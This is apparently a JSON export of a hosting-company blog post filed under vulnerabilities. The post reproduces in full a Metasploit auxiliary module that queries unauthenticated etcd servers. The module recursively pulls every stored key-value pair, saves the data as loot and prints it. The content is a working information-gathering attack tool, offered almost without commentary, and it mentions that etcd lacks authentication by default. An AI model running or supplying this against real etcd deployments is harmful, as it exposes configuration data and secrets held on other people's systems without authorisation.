##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Etcd
include Msf::Auxiliary::Scanner<\/p>\n
def initialize
super(
‘Name’ => ‘Etcd Keys API Information Gathering’,
‘Description’ => %q(
This module queries the etcd API to recursively retrieve all of the stored
key value pairs. Etcd by default does not utilize authentication.
),
‘References’ => [
[‘URL’, ‘https:\/\/gcollazo.com\/the-security-footgun-in-etcd\/’]],
‘Author’ => [
‘Giovanni Collazo <hello@gcollazo.com>’, # discovery
‘h00die’ # msf module
],
‘License’ => MSF_LICENSE,
‘DisclosureDate’ => “Mar 16 2018”
)
end<\/p>\n
def run_host(_target_host)
path = normalize_uri(target_uri.to_s, ‘v2\/keys\/?recursive=true’)<\/p>\n
banner = fingerprint_service(target_uri.to_s)
vprint_status(“#{peer} – Collecting data through #{path}…”)
res = send_request_raw(
‘uri’ => path,
‘method’ => ‘GET’
)<\/p>\n
# parse the json if we got a good request back
if res && res.code == 200
begin
response = res.get_json_document
store_loot(‘etcd.data’, ‘text\/json’, rhost, response, ‘etcd.keys’, ‘etcd keys’)
rescue JSON::ParserError => e
print_error(“Failed to read JSON: #{e.class} – #{e.message}}”)
return
end
print_good(“#{peer}\\nVersion: #{banner}\\nData: #{JSON.pretty_generate(response)}”)
elsif res
vprint_errord(“Invalid response #{res.code} for etcd open keys response”)
return
else
verbose_error(“No response for etcd open keys probe”)
return
end
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"
### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Auxiliaryinclude Msf::Exploit::Remote::HttpClientinclude Msf::Auxiliary::Reportinclude Msf::Auxiliary::Etcdinclude Msf::Auxiliary::Scanner def initializesuper(‘Name’ => ‘Etcd Keys API Information Gathering’,‘Description’ => %q(This module queries the etcd API to recursively retrieve all of the storedkey value pairs. Etcd by default does not utilize authentication.),‘References’ => [[‘URL’, ‘https:\/\/gcollazo.com\/the-security-footgun-in-etcd\/’]],‘Author’ => [‘Giovanni Collazo <hello@gcollazo.com>’, …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59316","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59316","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59316"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59316\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59316"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59316"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59316"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}